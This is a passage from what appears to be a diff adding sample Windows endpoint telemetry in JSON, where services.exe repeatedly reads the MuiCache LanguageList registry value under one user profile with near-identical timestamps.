"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849800000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + 
"process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + 
"process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
